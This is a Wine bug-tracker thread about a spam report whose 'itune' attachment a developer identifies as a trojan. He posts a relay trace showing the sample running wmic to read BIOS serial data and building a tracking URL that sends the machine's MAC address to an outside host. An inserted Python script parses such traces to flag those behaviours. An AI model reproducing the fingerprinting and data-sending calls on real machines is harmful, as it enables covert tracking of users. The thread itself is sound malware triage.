https://bugs.winehq.org/show_bug.cgi?id=37365

            Bug ID: 37365
           Summary: itune
           Product: Wine
           Version: 1.2.2
          Hardware: x86
                OS: Linux
            Status: UNCONFIRMED
          Severity: normal
          Priority: P2
         Component: -unknown
          Assignee: wine-bugs(a)winehq.org
          Reporter: steven1887(a)hotmail.com

Created attachment 49687
  --> https://bugs.winehq.org/attachment.cgi?id=49687
itune

itune

--
Do not reply to this email, post in Bugzilla using the above URL to reply.
You are receiving this mail because:
You are watching all bug changes.

https://bugs.winehq.org/show_bug.cgi?id=37365

Anastasius Focht <focht(a)gmx.net> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|UNCONFIRMED                 |RESOLVED
                 CC|                            |focht(a)gmx.net
         Resolution|---                         |INVALID
            Summary|itune                       |spam/malware

--- Comment #1 from Anastasius Focht <focht(a)gmx.net> ---
Hello folks,

invalid.

Wine's trace capability is also good for analysing malware .. kinda stupid code though.

--- snip ---
...
0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\\users\\focht\\Temp\\baccabebbbha.exe /PID=10096 /SUBPID=0 /NETWORKID=1 /DISTID=19132 /CID=0 /PRODUCT_ID=13577 /SERVER_URL=`omn7).`ip`[o're_,]pnn%ok_`e-_ok /CLICKID= /D1=4 /D2=-1 /D3=-1 /D4=-1 /D5=-1 /PRODUCT_PRIVACY= /PRODUCT_EULA= /PRODUCT_NAME=aOnlbm /EXE_URL=`omnp4.+sc^mm^+^johdlg\\)Znmfd*cmh'"...,00000000,00000000,00000000,00000000,00000000,00000000,0042bfe8,0033fa74) ret=00405297
...
0037:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0035:Ret KERNEL32.CreateProcessA() retval=00000001 ret=00405297
0035:Call KERNEL32.CloseHandle(00000068) ret=004052a4
0035:Ret KERNEL32.CloseHandle() retval=00000001 ret=004052a4
0035:Call KERNEL32.WaitForSingleObject(00000064,00000064) ret=00401e57
...
0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\\users\\focht\\Temp\\91412521814.aaa bios get serialnumber",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
...
0039:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146
...
0039:Starting process L"C:\\windows\\system32\\wmic.exe" (entryproc=0x7edfc33c)
...
Error: Command line not supported
...
0039:Call KERNEL32.ExitProcess(ffffffff) ret=7edfc3ca
...
0037:Call KERNEL32.CreateProcessW(00000000,004d8a38 L"wmic /output:C:\\users\\focht\\Temp\\91412521814.aaa bios get version",00000000,00000000,00000000,08000000,00000000,00000000,0033e954,0033e998) ret=00477146
...
003b:Call KERNEL32.__wine_kernel_init() ret=7bc5a089
0037:Ret KERNEL32.CreateProcessW() retval=00000001 ret=00477146
...
0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://direct.the-apps-track.com/Installer/Flow?pubid=10096&distid=19132&productid=13577&subpubid=0&campaignid=0&networkid=1&dfb=-1&os=5.1&ospv=-1&iev=8.0&ffv=&chromev=&macaddress=70:71:BC:F0:11:B7&netv=&d1=4&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=105-84-117-110-101-115&cookieeula=&cookiepriv"...,00000170,00000000,0033e2f4) ret=00477b6c
...
--- snip ---

Admin please delete the attachment, it's malware (trojan/backdoor).

... or do you want me to make this malware to work perfectly with Wine? :)

Regards
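
The triage done by eye on the relay trace in the comment above can be scripted. The following is an added example, not part of the original comment and not Wine project code; it pulls process launches and HTTP URLs out of relay-format lines. The names triage, first_string and SAMPLE are hypothetical, and the sample lines are constructed placeholders in the same format as the trace.

```python
import re
from urllib.parse import urlsplit, parse_qs

# "TID:Call MODULE.Function(args..." as printed in the relay trace above
CALL_RE = re.compile(r'^(?P<tid>[0-9a-f]{4}):Call (?P<mod>[\w.]+)\.(?P<fn>\w+)\((?P<args>.*)')
# First narrow ("...") or wide (L"...") string argument. The trace escapes
# backslash and quote; control-character escapes are not decoded here.
STR_RE = re.compile(r'L?"((?:[^"\\]|\\.)*)"')

def first_string(args):
    m = STR_RE.search(args)
    return re.sub(r'\\(.)', r'\1', m.group(1)) if m else None

def triage(lines):
    """Return (tid, kind, detail) findings for process launches and URLs."""
    findings = []
    for line in lines:
        m = CALL_RE.match(line.strip())
        if not m:
            continue  # Ret lines, program output, "..." elisions
        text = first_string(m.group('args'))
        if text is None:
            continue
        tid, fn = m.group('tid'), m.group('fn')
        if fn in ('CreateProcessA', 'CreateProcessW'):
            words = text.lower().split()
            # wmic querying BIOS data is a hardware-fingerprinting indicator
            hit = bool(words) and words[0] in ('wmic', 'wmic.exe') and 'bios' in words
            findings.append((tid, 'hw-fingerprint' if hit else 'process', text))
        elif fn == 'WinHttpCrackUrl':
            url = urlsplit(text)
            params = sorted(parse_qs(url.query, keep_blank_values=True))
            findings.append((tid, 'http', f'{url.hostname} params={",".join(params)}'))
    return findings

# Constructed sample lines (placeholder paths, host and MAC), not from the bug report
SAMPLE = [
    r'0035:Call KERNEL32.CreateProcessA(00000000,00409b80 "C:\\users\\test\\Temp\\sample.exe /PID=1",00000000) ret=00405297',
    r'0037:Call KERNEL32.CreateProcessW(00000000,004d78e8 L"wmic /output:C:\\users\\test\\Temp\\out.aaa bios get serialnumber",00000000) ret=00477146',
    r'0037:Call winhttp.WinHttpCrackUrl(004d9648 L"http://tracker.example.invalid/Flow?pubid=1&macaddress=00:00:5E:00:53:01"...,00000170) ret=00477b6c',
    r'0035:Ret KERNEL32.CloseHandle() retval=00000001 ret=004052a4',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

String arguments that the trace truncates with "..." yield only the visible part of the command line or URL.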

https://bugs.winehq.org/show_bug.cgi?id=37365

--- Comment #2 from Austin English <austinenglish(a)gmail.com> ---
The content of attachment 49687 has been deleted for the following reason:

malware

https://bugs.winehq.org/show_bug.cgi?id=37365

Bruno Jesus <00cpxxx(a)gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|RESOLVED                    |CLOSED

--- Comment #3 from Bruno Jesus <00cpxxx(a)gmail.com> ---
Closing invalid bugs.